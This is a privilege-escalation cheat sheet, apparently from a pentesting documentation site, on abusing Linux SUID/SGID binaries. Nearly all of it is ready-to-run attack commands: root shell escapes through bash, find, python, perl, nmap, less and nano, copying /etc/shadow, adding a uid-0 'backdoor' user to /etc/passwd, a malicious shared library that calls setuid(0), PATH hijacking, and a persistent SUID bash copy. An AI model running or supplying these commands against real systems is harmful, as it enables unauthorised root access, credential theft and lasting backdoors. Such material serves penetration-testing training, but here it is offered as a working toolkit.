Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
SUID (Set User ID) binaries run as the file owner. If owner is root → code runs as root regardless of who executes it.
SGID (Set Group ID) runs with the file’s group permissions.
Find SUID Binaries
find / -perm -4000 -type f 2>/dev/null
Find SGID Binaries
find / -perm -2000 -type f 2>/dev/null
Both
find / -perm /6000 -type f 2>/dev/null
GTFOBins
Check every SUID binary against GTFOBins:
https://gtfobins.github.io/#+suid
Common SUID Exploits
bash
-p preserves effective UID (root).
find
find . -exec /bin/bash -p \;
/etc/shadow or overwrite /etc/passwd:
# Read shadow
cp /etc/shadow /tmp/shadow
# Add root user to passwd
echo 'backdoor:$(openssl passwd -1 password):0:0::/root:/bin/bash' >> /tmp/passwd
cp /tmp/passwd /etc/passwd
su backdoor
vim / vi
python
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
perl
perl -e 'exec "/bin/bash -p";'
nmap (Old Versions)
Newer nmap:
echo 'os.execute("/bin/bash -p")' > /tmp/nse.nse
nmap --script=/tmp/nse.nse
env
less / more
less /etc/shadow
!/bin/bash
nano
nano /etc/shadow
# Read contents, then Ctrl+R → Ctrl+X → command
reset; bash -p 1>&0 2>&0
Custom SUID Binary
If you find unknown SUID binary, analyze it:
Check What It Does
strings /path/to/suid-binary
ltrace /path/to/suid-binary
strace /path/to/suid-binary
Shared Library Injection
Check for missing libraries:
If it loads from writable path:
#include <stdlib.h>
#include <unistd.h>
void _init() {
setuid(0);
setgid(0);
system("/bin/bash -p");
}
gcc -shared -fPIC -nostartfiles -o /writable/path/lib.so exploit.c
PATH Hijacking on SUID Binary
If SUID binary calls a command without full path (e.g., system("cat /etc/shadow")):
echo '/bin/bash -p' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
/path/to/suid-binary
Create SUID Binary (If Already Root)
Persistence:
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash